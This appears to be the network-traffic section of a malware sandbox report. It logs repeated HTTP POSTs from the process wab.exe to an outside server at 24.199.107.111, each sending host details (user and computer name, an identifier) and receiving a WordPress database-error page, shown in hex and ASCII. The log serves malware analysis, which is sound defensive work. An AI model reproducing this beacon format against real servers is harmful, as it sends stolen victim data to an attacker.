                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:10.739712954 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:10.739725113 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.54973324.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:11.056904078 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:11.219746113 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:12.015815020 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:11 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:12.015836000 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:12.015863895 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.54973424.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:12.336915970 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:12.499274969 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:13.310287952 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:12 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:13.310311079 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:13.310326099 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.54973524.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:13.616364002 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:13.778737068 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:14.544205904 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:13 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:14.544229984 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:14.544245958 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.54973624.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:14.853773117 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:15.016380072 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:15.821432114 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:14 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
